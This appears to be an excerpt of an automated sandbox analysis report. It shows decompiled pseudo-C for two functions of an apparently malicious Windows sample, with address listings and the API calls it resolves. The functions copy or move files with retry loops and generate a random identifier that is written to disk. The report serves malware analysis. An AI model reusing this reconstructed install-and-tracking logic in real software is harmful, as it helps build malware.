				signed int _t150;
				int _t152;
				intOrPtr _t154;
				signed int _t156;
				intOrPtr _t159;
				intOrPtr _t161;
				signed int _t164;
				signed int _t166;
				intOrPtr _t167;
				intOrPtr _t170;
				intOrPtr _t172;
				signed int* _t184;
				intOrPtr _t188;
				intOrPtr _t194;
				signed int _t195;
				intOrPtr _t198;
				char* _t199;
				intOrPtr _t200;
				signed int _t201;
				intOrPtr _t204;
				intOrPtr _t205;
				void* _t206;
				intOrPtr _t213;
				intOrPtr _t214;
				signed int _t218;
				signed int _t220;
				signed int _t221;
				intOrPtr _t228;
				intOrPtr* _t229;
				int _t231;
				intOrPtr _t237;
				intOrPtr _t239;
				signed int _t251;
				void* _t259;
				signed int _t260;
				signed int* _t262;
				signed int _t263;
				signed int _t268;
				signed int* _t269;
				short* _t270;
				void* _t271;
				void* _t272;
				void* _t273;
				void* _t274;
				signed int _t276;
				void* _t277;
				void* _t278;
				void* _t279;
				void* _t280;
				void* _t282;

				_t259 = __edi;
				_t87 =  *0x3b8570; // 0x0
				_v8 = 0;
				_v12 = 0;
				if(_t87 != 1) {
					_push(__esi);
					E00398030( &_v8);
					_t220 =  *0x3b8570; // 0x0
					_t280 = _t279 + 4;
					__eflags = _t220 - 2;
					if(_t220 != 2) {
						_t89 =  *0x3b8570; // 0x0
						__eflags = _t89;
						if(_t89 == 0) {
							__eflags = _a12 | _a16;
							if(__eflags != 0) {
								L34:
								_t93 =  &_v764;
								_push(_t259);
								_t260 = 0;
								_t221 = 0x104;
								_t268 = _v8 - _t93;
								__eflags = _t268;
								while(1) {
									_t53 = _t221 + 0x7ffffefa; // 0x7ffffffe
									__eflags = _t53;
									if(_t53 == 0) {
										break;
									}
									_t195 =  *(_t268 + _t93) & 0x0000ffff;
									__eflags = _t195;
									if(_t195 == 0) {
										break;
									} else {
										 *_t93 = _t195;
										_t93 = _t93 + 2;
										_t221 = _t221 - 1;
										__eflags = _t221;
										if(_t221 != 0) {
											continue;
										} else {
											L40:
											_t93 = _t93 - 2;
											__eflags = _t93;
											_t260 = 0x8007007a;
										}
									}
									L41:
									 *_t93 = 0;
									__eflags = _t260;
									if(__eflags >= 0) {
										E00399090(__eflags,  &_v240, 0xf);
										_t96 =  *0x3b8628; // 0x593938
										_t282 = _t280 + 8;
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x1dc))))( &_v764,  &_v240);
										_t98 =  *0x3b8628; // 0x593938
										_t99 =  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0xc0))))( &_v764);
										__eflags = _t99 - 0xffffffff;
										if(_t99 != 0xffffffff) {
											__eflags = _t99 & 0x00000010;
											if((_t99 & 0x00000010) == 0) {
												_t272 = 0;
												while(1) {
													_t127 =  *0x3b8628; // 0x593938
													_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t127 + 0x50))))( &_v764, 0x80);
													__eflags = _t128;
													if(_t128 == 0) {
														_t239 =  *0x3b8628; // 0x593938
														 *((intOrPtr*)( *((intOrPtr*)(_t239 + 0xc8))))(0x3e8);
													}
													_t237 =  *0x3b8628; // 0x593938
													_t130 =  *((intOrPtr*)( *((intOrPtr*)(_t237 + 0xa4))))( &_v764);
													__eflags = _t130;
													if(_t130 != 0) {
														goto L49;
													}
													_t194 =  *0x3b8628; // 0x593938
													 *((intOrPtr*)( *((intOrPtr*)(_t194 + 0xc8))))(0x3e8);
													_t272 = _t272 + 1;
													__eflags = _t272 - 3;
													if(_t272 < 3) {
														continue;
													}
													goto L49;
												}
											}
										}
										L49:
										_push(0x3b8578);
										_push(0x19);
										_push(_a8);
										_t101 = E00395A10();
										_t280 = _t282 + 0xc;
										__eflags = _t101;
										if(_t101 != 0) {
											_t184 =  *0x3b8578; // 0x0
											_t269 = _t184;
											_t103 = _t269 - _t184;
											__eflags = (_t103 & 0xfffffffe) - 0x400;
											if((_t103 & 0xfffffffe) >= 0x400) {
												L64:
												_t104 =  *0x3b8574; // 0x0
												__eflags = _t104;
												if(_t104 == 0) {
													_t104 = E003A1D90(0x20a, 0);
													_t280 = _t280 + 8;
													 *0x3b8574 = _t104;
												}
												_t105 =  *0x3b8628; // 0x593938
												__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t105 + 0xb4))))(0x104, _t104);
												if(__eflags != 0) {
													E00399090(__eflags,  &_v240, 0xe);
													_t108 =  *0x3b8574; // 0x0
													_t228 =  *0x3b8628; // 0x593938
													_t280 = _t280 + 8;
													 *((intOrPtr*)( *((intOrPtr*)(_t228 + 0xdc))))(_t108,  &_v240, 0, _t108);
													_t229 =  *0x3b8628; // 0x593938
													 *((intOrPtr*)( *_t229))(0, 0, E0039D400, 0, 0,  &_v20);
													_t188 =  *0x3b8628; // 0x593938
													 *((intOrPtr*)( *((intOrPtr*)(_t188 + 0xc8))))(0x1f4);
													_v12 = 0;
												}
											} else {
												while(1) {
													__eflags =  *_t269;
													if( *_t269 == 0) {
														break;
													}
													_t103 = _t103 + 2;
													_t269 =  &(_t269[0]);
													__eflags = (_t103 & 0xfffffffe) - 0x400;
													if((_t103 & 0xfffffffe) < 0x400) {
														continue;
													}
													break;
												}
												__eflags = _t269 - _t184;
												if(_t269 <= _t184) {
													goto L64;
												} else {
													__eflags = (_t269 - _t184 & 0xfffffffe) - 0x400;
													if((_t269 - _t184 & 0xfffffffe) >= 0x400) {
														goto L64;
													} else {
														_t262 = _t269;
														_t270 = _t269 - 2;
														__eflags = _t270 - _t184;
														if(_t270 > _t184) {
															while(1) {
																__eflags =  *_t270 - 0x2f;
																if( *_t270 == 0x2f) {
																	goto L58;
																}
																_t270 = _t270 - 2;
																__eflags = _t270 - _t184;
																if(_t270 > _t184) {
																	continue;
																}
																goto L58;
															}
														}
														L58:
														_t271 = _t270 + 2;
														__eflags = _t271 - _t262;
														if(__eflags >= 0) {
															L61:
															_t117 =  *0x3b8590; // 0x0
															__eflags = _t117;
															if(_t117 != 0) {
																E0039BB40(_t117);
																_t280 = _t280 + 4;
															}
															_t263 = _t262 - _t271;
															__eflags = _t263;
															_t77 = (_t263 >> 1) + 2; // 0x0
															 *0x3b858c = (_t263 >> 1) + _t77;
															_t119 = E003A1D90((_t263 >> 1) + _t77, 0);
															_t231 =  *0x3b858c; // 0x0
															 *0x3b8590 = _t119;
															memcpy(_t119, _t271, _t231);
															_t280 = _t280 + 0x14;
															goto L64;
														} else {
															E00399090(__eflags,  &_v240, 0xc3);
															_t124 = E00393C70( &_v240,  &_v240,  &_v16,  &_v24);
															_t280 = _t280 + 0x14;
															__eflags = _t124;
															if(_t124 == 0) {
																goto L61;
															} else {
																_t125 =  *0x3b8628; // 0x593938
																_t126 =  *((intOrPtr*)( *((intOrPtr*)(_t125 + 0xe0))))(_t271, _v16);
																__eflags = _t126;
																if(_t126 != 0) {
																	goto L61;
																}
															}
														}
													}
												}
											}
										}
									}
									goto L69;
								}
								__eflags = _t221;
								if(_t221 == 0) {
									goto L40;
								}
								goto L41;
							} else {
								E00399090(__eflags,  &_v240, 0xc3);
								_t280 = _t280 + 8;
								_t136 = GetFileAttributesW( &_v240); // executed
								__eflags = _t136 - 0xffffffff;
								if(_t136 != 0xffffffff) {
									__eflags = _t136 & 0x00000010;
									if((_t136 & 0x00000010) == 0) {
										goto L34;
									}
								}
							}
						}
					} else {
						E0039E520( &_v40);
						_t198 =  *0x3b8628; // 0x593938
						 *((intOrPtr*)( *((intOrPtr*)(_t198 + 0xb4))))(0x104,  &_v1288);
						E00399090(__eflags,  &_v240, 0xe);
						_t280 = _t280 + 8;
						_t199 =  &_v1288;
						_t200 =  *0x3b8628; // 0x593938
						 *((intOrPtr*)( *((intOrPtr*)(_t200 + 0xdc))))(_t199,  &_v240, 0, _t199);
						_t201 =  *0x3b8574; // 0x0
						_t145 = E003912D0( &_v40, __esi, _a4, _t201,  &_v1288);
						__eflags = _t145;
						if(_t145 == 0) {
							L29:
							E00397AD0( &_v40);
						} else {
							_t273 = 0;
							while(1) {
								_t204 =  *0x3b8628; // 0x593938
								_t148 =  *((intOrPtr*)( *((intOrPtr*)(_t204 + 0xa4))))(_v8);
								__eflags = _t148;
								if(_t148 != 0) {
									break;
								}
								_t172 =  *0x3b8628; // 0x593938
								 *((intOrPtr*)( *((intOrPtr*)(_t172 + 0xc8))))(0x3e8);
								_t273 = _t273 + 1;
								__eflags = _t273 - 0xa;
								if(_t273 < 0xa) {
									continue;
								} else {
									L11:
									_t156 =  &_v764;
									_t251 = 0x104;
									_t276 = _v8 - _t156;
									__eflags = _t276;
									while(1) {
										_t23 = _t251 + 0x7ffffefa; // 0x7ffffffe
										__eflags = _t23;
										if(_t23 == 0) {
											break;
										}
										_t218 =  *(_t276 + _t156) & 0x0000ffff;
										__eflags = _t218;
										if(_t218 == 0) {
											break;
										} else {
											 *_t156 = _t218;
											_t156 = _t156 + 2;
											_t251 = _t251 - 1;
											__eflags = _t251;
											if(_t251 != 0) {
												continue;
											} else {
												L17:
												_t156 = _t156 - 2;
												__eflags = _t156;
											}
										}
										L18:
										 *_t156 = 0;
										E00399090(__eflags,  &_v240, 0xf);
										_t159 =  *0x3b8628; // 0x593938
										_t280 = _t280 + 8;
										 *((intOrPtr*)( *((intOrPtr*)(_t159 + 0x1dc))))( &_v764,  &_v240);
										_t161 =  *0x3b8628; // 0x593938
										 *((intOrPtr*)( *((intOrPtr*)(_t161 + 0xa4))))( &_v764);
										_t277 = 0;
										__eflags = 0;
										while(1) {
											_t213 =  *0x3b8628; // 0x593938
											_t164 =  *((intOrPtr*)( *((intOrPtr*)(_t213 + 0xd4))))(_v8,  &_v764, 2);
											__eflags = _t164;
											if(_t164 != 0) {
												break;
											}
											_t170 =  *0x3b8628; // 0x593938
											 *((intOrPtr*)( *((intOrPtr*)(_t170 + 0xc8))))(0x3e8);
											_t277 = _t277 + 1;
											__eflags = _t277 - 0xa;
											if(_t277 < 0xa) {
												continue;
											}
											break;
										}
										_t278 = 0;
										__eflags = 0;
										while(1) {
											_t214 =  *0x3b8628; // 0x593938
											_t166 =  *((intOrPtr*)( *((intOrPtr*)(_t214 + 0xb0))))( &_v1288, _v8);
											__eflags = _t166;
											if(_t166 != 0) {
												break;
											}
											_t167 =  *0x3b8628; // 0x593938
											 *((intOrPtr*)( *((intOrPtr*)(_t167 + 0xc8))))(0x3e8);
											_t278 = _t278 + 1;
											__eflags = _t278 - 0xa;
											if(_t278 < 0xa) {
												continue;
											} else {
												 *0x3b8570 = 0;
												E00397AD0( &_v40);
											}
											goto L69;
										}
										L25:
										_v12 = 1;
										__eflags =  *0x3b8590; // 0x0
										if(__eflags != 0) {
											__eflags =  *0x3b858c; // 0x0
											if(__eflags > 0) {
												E00399090(__eflags,  &_v240, 0xc3);
												_t152 =  *0x3b858c; // 0x0
												_t206 =  *0x3b8590; // 0x0
												E00391A80(_t206,  &_v240, _t206, _t152);
												_t280 = _t280 + 0x14;
											}
										}
										 *0x3b8570 = 0;
										goto L29;
									}
									__eflags = _t251;
									if(__eflags == 0) {
										goto L17;
									}
									goto L18;
								}
								goto L69;
							}
							_t274 = 0;
							__eflags = 0;
							while(1) {
								_t205 =  *0x3b8628; // 0x593938
								_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t205 + 0xd4))))( &_v1288, _v8, 2);
								__eflags = _t150;
								if(_t150 != 0) {
									goto L25;
								}
								_t154 =  *0x3b8628; // 0x593938
								 *((intOrPtr*)( *((intOrPtr*)(_t154 + 0xc8))))(0x3e8);
								_t274 = _t274 + 1;
								__eflags = _t274 - 0xa;
								if(_t274 < 0xa) {
									continue;
								} else {
									goto L11;
								}
								goto L69;
							}
							goto L25;
						}
					}
					L69:
					_t90 = _v8;
					__eflags = _t90;
					if(_t90 != 0) {
						E0039BB40(_t90);
					}
					return _v12;
				} else {
					return 0;
				}
			}





















































































    0x003936e0
    0x003936e9
    0x003936f1
    0x003936f4
    0x003936fa
    0x00393706
    0x00393708
    0x0039370d
    0x00393713
    0x00393716
    0x00393719
    0x0039396f
    0x00393974
    0x00393976
    0x0039397f
    0x00393982
    0x003939be
    0x003939c1
    0x003939c7
    0x003939ca
    0x003939cc
    0x003939d1
    0x003939d1
    0x003939d3
    0x003939d3
    0x003939d9
    0x003939db
    0x00000000
    0x00000000
    0x003939dd
    0x003939e1
    0x003939e4
    0x00000000
    0x003939e6
    0x003939e6
    0x003939e9
    0x003939ec
    0x003939ec
    0x003939ed
    0x00000000
    0x003939ef
    0x003939f5
    0x003939f5
    0x003939f5
    0x003939f8
    0x003939f8
    0x003939ed
    0x003939fd
    0x003939ff
    0x00393a02
    0x00393a04
    0x00393a13
    0x00393a18
    0x00393a1d
    0x00393a34
    0x00393a36
    0x00393a48
    0x00393a4a
    0x00393a4d
    0x00393a4f
    0x00393a51
    0x00393a53
    0x00393a60
    0x00393a60
    0x00393a74
    0x00393a76
    0x00393a78
    0x00393a7a
    0x00393a8b
    0x00393a8b
    0x00393a8d
    0x00393aa0
    0x00393aa2
    0x00393aa4
    0x00000000
    0x00000000
    0x00393aa6
    0x00393ab7
    0x00393ab9
    0x00393aba
    0x00393abd
    0x00000000
    0x00000000
    0x00000000
    0x00393abd
    0x00393a60
    0x00393a51
    0x00393abf
    0x00393ac2
    0x00393ac7
    0x00393ac9
    0x00393aca
    0x00393acf
    0x00393ad2
    0x00393ad4
    0x00393ada
    0x00393ae0
    0x00393ae4
    0x00393aeb
    0x00393af1
    0x00393bc8
    0x00393bc8
    0x00393bcd
    0x00393bcf
    0x00393bd7
    0x00393bdc
    0x00393bdf
    0x00393bdf
    0x00393be5
    0x00393bf7
    0x00393bf9
    0x00393c04
    0x00393c09
    0x00393c0e
    0x00393c14
    0x00393c27
    0x00393c29
    0x00393c3e
    0x00393c40
    0x00393c51
    0x00393c53
    0x00393c53
    0x00393af7
    0x00393af7
    0x00393af7
    0x00393afa
    0x00000000
    0x00000000
    0x00393afc
    0x00393b04
    0x00393b07
    0x00393b0d
    0x00000000
    0x00000000
    0x00000000
    0x00393b0d
    0x00393b0f
    0x00393b11
    0x00000000
    0x00393b17
    0x00393b1e
    0x00393b23
    0x00000000
    0x00393b29
    0x00393b29
    0x00393b2b
    0x00393b2e
    0x00393b30
    0x00393b32
    0x00393b32
    0x00393b36
    0x00000000
    0x00000000
    0x00393b38
    0x00393b3b
    0x00393b3d
    0x00000000
    0x00000000
    0x00000000
    0x00393b3d
    0x00393b32
    0x00393b3f
    0x00393b3f
    0x00393b42
    0x00393b44
    0x00393b8c
    0x00393b8c
    0x00393b91
    0x00393b93
    0x00393b96
    0x00393b9b
    0x00393b9b
    0x00393b9e
    0x00393b9e
    0x00393ba2
    0x00393ba8
    0x00393bad
    0x00393bb2
    0x00393bbb
    0x00393bc0
    0x00393bc5
    0x00000000
    0x00393b46
    0x00393b52
    0x00393b66
    0x00393b6b
    0x00393b6e
    0x00393b70
    0x00000000
    0x00393b72
    0x00393b75
    0x00393b82
    0x00393b84
    0x00393b86
    0x00000000
    0x00000000
    0x00393b86
    0x00393b70
    0x00393b44
    0x00393b23
    0x00393b11
    0x00393af1
    0x00393ad4
    0x00000000
    0x00393c56
    0x003939f1
    0x003939f3
    0x00000000
    0x00000000
    0x00000000
    0x00393984
    0x00393990
    0x003939a1
    0x003939ab
    0x003939ad
    0x003939b0
    0x003939b6
    0x003939b8
    0x00000000
    0x00000000
    0x003939b8
    0x003939b0
    0x00393982
    0x0039371f
    0x00393722
    0x00393727
    0x0039373f
    0x0039374a
    0x0039374f
    0x00393752
    0x00393762
    0x00393770
    0x00393772
    0x00393787
    0x0039378c
    0x0039378e
    0x00393962
    0x00393965
    0x00393794
    0x00393794
    0x003937a0
    0x003937a3
    0x003937b0
    0x003937b2
    0x003937b4
    0x00000000
    0x00000000
    0x003937b6
    0x003937c6
    0x003937c8
    0x003937c9
    0x003937cc
    0x00000000
    0x003937ce
    0x0039380d
    0x00393810
    0x00393818
    0x0039381d
    0x0039381d
    0x00393820
    0x00393820
    0x00393826
    0x00393828
    0x00000000
    0x00000000
    0x0039382a
    0x0039382e
    0x00393831
    0x00000000
    0x00393833
    0x00393833
    0x00393836
    0x00393839
    0x00393839
    0x0039383a
    0x00000000
    0x0039383c
    0x00393842
    0x00393842
    0x00393842
    0x00393842
    0x0039383a
    0x00393845
    0x00393847
    0x00393853
    0x00393858
    0x0039385d
    0x00393874
    0x00393876
    0x00393888
    0x0039388a
    0x0039388a
    0x00393890
    0x00393893
    0x003938a9
    0x003938ab
    0x003938ad
    0x00000000
    0x00000000
    0x003938af
    0x003938bf
    0x003938c1
    0x003938c2
    0x003938c5
    0x00000000
    0x00000000
    0x00000000
    0x003938c5
    0x003938c7
    0x003938c7
    0x003938d0
    0x003938d3
    0x003938e7
    0x003938e9
    0x003938eb
    0x00000000
    0x00000000
    0x003938ed
    0x003938fd
    0x003938ff
    0x00393900
    0x00393903
    0x00000000
    0x00393905
    0x00393908
    0x0039390e
    0x0039390e
    0x00000000
    0x00393903
    0x00393918
    0x00393918
    0x0039391f
    0x00393925
    0x00393927
    0x0039392d
    0x0039393b
    0x00393940
    0x00393945
    0x00393954
    0x00393959
    0x00393959
    0x0039392d
    0x0039395c
    0x00000000
    0x0039395c
    0x0039383e
    0x00393840
    0x00000000
    0x00000000
    0x00000000
    0x00393840
    0x00000000
    0x003937cc
    0x003937d0
    0x003937d0
    0x003937d2
    0x003937d5
    0x003937eb
    0x003937ed
    0x003937ef
    0x00000000
    0x00000000
    0x003937f5
    0x00393805
    0x00393807
    0x00393808
    0x0039380b
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0039380b
    0x00000000
    0x003937d2
    0x0039378e
    0x00393c57
    0x00393c57
    0x00393c5b
    0x00393c5d
    0x00393c60
    0x00393c65
    0x00393c6f
    0x003936fc
    0x00393702
    0x00393702

    APIs
      • Part of subcall function 00391A80: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00391BCA,?,003A171D,?,00391BCA,?,?), ref: 00391AAB
      • Part of subcall function 00391A80: WriteFile.KERNEL32(00000000,?,00391BCA,000000CC,00000000,?,003A171D,?,00391BCA,?,?,000000CC), ref: 00391ACD
    • GetFileAttributesW.KERNELBASE(?), ref: 003939AB
      • Part of subcall function 00395A10: Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,0039FE81), ref: 00395ABF
      • Part of subcall function 00395A10: Sleep.KERNELBASE(00004E20,00000000,0039FE81,757DC426,00000000,00000000,?,?,00000000,0039FE81), ref: 00395B3E
    • memcpy.MSVCRT ref: 00393BC0
      • Part of subcall function 00393C70: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?,?,?,003A14F1,?,00391BCA,?), ref: 00393C9E
      • Part of subcall function 00393C70: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,003A14F1,?,00391BCA,?,?,000000B3,00000000,?,?), ref: 00393CBB
      • Part of subcall function 00393C70: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,003A14F1,?,00391BCA,?,?,000000B3,00000000,?,?), ref: 00393CD0
      • Part of subcall function 00393C70: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?), ref: 00393D08
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 0039E520: CoCreateInstance.OLE32(003B32CC,00000000,00000001,003B32DC,00000000,00396A37,?,00000000), ref: 0039E55C
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003A14A0, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 215
    C-Code - Quality: 97%
    			E003A14A0(intOrPtr __ecx) {
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				char _v300;
				short _v1324;
				void* __edi;
				intOrPtr _t73;
				void* _t77;
				void* _t81;
				void* _t84;
				void* _t93;
				int _t95;
				signed int _t98;
				signed int _t99;
				intOrPtr _t110;
				signed int _t114;
				intOrPtr _t125;
				intOrPtr _t126;
				intOrPtr _t130;
				intOrPtr _t148;
				intOrPtr _t149;
				short* _t150;
				short* _t152;
				short* _t155;
				void* _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				void* _t161;

				_t149 = __ecx;
				_t73 =  *((intOrPtr*)(__ecx + 0x14));
				_v16 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_t164 = _t73;
				if(_t73 != 0) {
					E0039BB40(_t73);
					_t157 = _t157 + 4;
					 *((intOrPtr*)(__ecx + 0x14)) = 0;
				}
				E00399090(_t164,  &_v1324, 0xb3);
				_t77 = E00393C70( &_v12,  &_v1324,  &_v8,  &_v12); // executed
				_t158 = _t157 + 0x14;
				_t165 = _t77;
				if(_t77 != 0) {
					L25:
					 *((intOrPtr*)(_t149 + 0x14)) = _v8;
					return 1;
				} else {
					E00399090(_t165,  &_v1324, 0x33);
					_t81 = E00393C70( &_v1324,  &_v1324,  &_v8,  &_v12); // executed
					_t159 = _t158 + 0x14;
					_t166 = _t81;
					if(_t81 != 0) {
						goto L25;
					} else {
						E00399090(_t166,  &_v1324, 0xcc);
						_t84 = E00393C70( &_v8,  &_v1324,  &_v8,  &_v12); // executed
						_t160 = _t159 + 0x14;
						if(_t84 != 0) {
							goto L25;
						} else {
							_t125 =  *0x3b8628; // 0x593938
							_v300 = 0x11c;
							 *((intOrPtr*)( *((intOrPtr*)(_t125 + 0xfc))))( &_v300);
							_t114 = 0x208;
							_t155 = E003A1D90(0x410, 0);
							_t161 = _t160 + 8;
							_v8 = _t155;
							if(_t155 == 0) {
								L18:
								E0039BB40(_t155);
								 *((intOrPtr*)(_t149 + 0x14)) = 0;
								return 0;
							} else {
								_t126 =  *0x3b8628; // 0x593938
								_push( &_v12);
								_v12 = 0x208;
								_push(_t155);
								if( *((intOrPtr*)( *((intOrPtr*)(_t126 + 4))))() == 0) {
									_t114 = 0x23a;
									_t110 = E003A1D90(0x474, _v8);
									_t148 =  *0x3b8628; // 0x593938
									_t161 = _t161 + 8;
									_v8 = _t110;
									 *((intOrPtr*)( *((intOrPtr*)(_t148 + 4))))(_t110,  &_v12);
								}
								E00391000(_v8, 0x5f);
								_t155 = _v8;
								_t161 = _t161 + 8;
								_t150 = _t155;
								_t93 = _t155 + _t114 * 2;
								if( *_t155 == 0) {
									L11:
									_t173 = _t150 - _t93;
									if(_t150 < _t93) {
										 *_t150 = 0x57005f;
										E00399090(_t173,  &_v1324, 0x44);
										wsprintfW(_t150 + 4,  &_v1324, _v296, _v292, _v288);
										_t155 = _v8;
										_t161 = _t161 + 0x1c;
									}
								} else {
									while(_t150 < _t93) {
										_t150 = _t150 + 2;
										if( *_t150 != 0) {
											continue;
										} else {
											goto L11;
										}
										goto L13;
									}
								}
								L13:
								if(_t155 == 0 || _t114 > 0x7fffffff) {
									L16:
									_v12 = 0;
									goto L17;
								} else {
									_t142 = _t155;
									if(E003B1160(_t114, _t155,  &_v12) >= 0) {
										_t152 = 0x20;
										do {
											_t95 = rand();
											 *((short*)(_v8 + _v12 * 2)) = (_t95 + L003B1270(_t95, _t142) & 0x0000000f) + 0x41;
											_t130 = _v8;
											_t98 = _v12;
											__eflags =  *((short*)(_t130 + _t98 * 2)) - 0x46;
											if( *((short*)(_t130 + _t98 * 2)) > 0x46) {
												_t142 = 0xffe9;
												_t51 = _t130 + _t98 * 2;
												 *_t51 =  *((intOrPtr*)(_t130 + _t98 * 2)) + 0xffe9;
												__eflags =  *_t51;
												_t130 = _v8;
												_t98 = _v12;
											}
											_t99 = _t98 + 1;
											_t152 = _t152 - 1;
											__eflags = _t152;
											_v12 = _t99;
										} while (_t152 != 0);
										 *((short*)(_t130 + _t99 * 2)) = 0;
										_v12 = _v12 + _v12 + 2;
										_t155 = E003A1D90(_v12 + _v12 + 2, _v8);
										_t161 = _t161 + 8;
										_v8 = _t155;
										__eflags = _t155;
										if(__eflags == 0) {
											L17:
											_t149 = _v16;
											goto L18;
										} else {
											E00399090(__eflags,  &_v1324, 0xcc);
											E00391A80(_v8,  &_v1324, _v8, _v12); // executed
											_t149 = _v16;
											goto L25;
										}
									} else {
										goto L16;
									}
								}
							}
						}
					}
				}
			}



































    0x003a14ac
    0x003a14ae
    0x003a14b3
    0x003a14b6
    0x003a14b9
    0x003a14bc
    0x003a14be
    0x003a14c1
    0x003a14c6
    0x003a14c9
    0x003a14c9
    0x003a14d8
    0x003a14ec
    0x003a14f1
    0x003a14f4
    0x003a14f6
    0x003a1723
    0x003a1726
    0x003a1734
    0x003a14fc
    0x003a1505
    0x003a1519
    0x003a151e
    0x003a1521
    0x003a1523
    0x00000000
    0x003a1529
    0x003a1535
    0x003a1549
    0x003a154e
    0x003a1553
    0x00000000
    0x003a1559
    0x003a1559
    0x003a1565
    0x003a1576
    0x003a157e
    0x003a1588
    0x003a158a
    0x003a158d
    0x003a1592
    0x003a166b
    0x003a166c
    0x003a1676
    0x003a167f
    0x003a1598
    0x003a1598
    0x003a15a1
    0x003a15a2
    0x003a15a8
    0x003a15ad
    0x003a15b8
    0x003a15bd
    0x003a15c2
    0x003a15c8
    0x003a15cf
    0x003a15d6
    0x003a15d6
    0x003a15de
    0x003a15e3
    0x003a15e6
    0x003a15ed
    0x003a15ef
    0x003a15f2
    0x003a1601
    0x003a1601
    0x003a1603
    0x003a160e
    0x003a1614
    0x003a1639
    0x003a163f
    0x003a1642
    0x003a1642
    0x00000000
    0x003a15f4
    0x003a15f8
    0x003a15ff
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003a15ff
    0x003a15f4
    0x003a1645
    0x003a1647
    0x003a1661
    0x003a1661
    0x00000000
    0x003a1651
    0x003a1656
    0x003a165f
    0x003a1686
    0x003a1690
    0x003a1690
    0x003a16a7
    0x003a16ab
    0x003a16ae
    0x003a16b1
    0x003a16b6
    0x003a16b8
    0x003a16bd
    0x003a16bd
    0x003a16bd
    0x003a16c1
    0x003a16c4
    0x003a16c4
    0x003a16c7
    0x003a16c8
    0x003a16c8
    0x003a16c9
    0x003a16c9
    0x003a16d0
    0x003a16e0
    0x003a16e8
    0x003a16ea
    0x003a16ed
    0x003a16f0
    0x003a16f2
    0x003a1668
    0x003a1668
    0x00000000
    0x003a16f8
    0x003a1704
    0x003a1718
    0x003a171d
    0x00000000
    0x003a1720
    0x00000000
    0x00000000
    0x00000000
    0x003a165f
    0x003a1647
    0x003a1592
    0x003a1553
    0x003a1523

    APIs
      • Part of subcall function 00393C70: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?,?,?,003A14F1,?,00391BCA,?), ref: 00393C9E
      • Part of subcall function 00393C70: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,003A14F1,?,00391BCA,?,?,000000B3,00000000,?,?), ref: 00393CBB
      • Part of subcall function 00393C70: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,003A14F1,?,00391BCA,?,?,000000B3,00000000,?,?), ref: 00393CD0
      • Part of subcall function 00393C70: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?), ref: 00393D08
      • Part of subcall function 003A1D90: LoadLibraryA.KERNEL32(?), ref: 003A1DB7
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DD8
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1DFE
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E1C
      • Part of subcall function 003A1D90: GetProcAddress.KERNEL32(00000000,?), ref: 003A1E3A
      • Part of subcall function 003A1D90: GetProcessHeap.KERNEL32 ref: 003A1E45
      • Part of subcall function 003A1D90: RtlReAllocateHeap.NTDLL(00290000,00000008,?,003A042E), ref: 003A1E5F
      • Part of subcall function 003A1D90: RtlAllocateHeap.NTDLL(00290000,00000008,003A042E), ref: 003A1E72
    • wsprintfW.USER32 ref: 003A1639
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    • rand.MSVCRT ref: 003A1690
      • Part of subcall function 00391A80: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00391BCA,?,003A171D,?,00391BCA,?,?), ref: 00391AAB
      • Part of subcall function 00391A80: WriteFile.KERNEL32(00000000,?,00391BCA,000000CC,00000000,?,003A171D,?,00391BCA,?,?,000000CC), ref: 00391ACD
    Strings
    Memory Dump Source
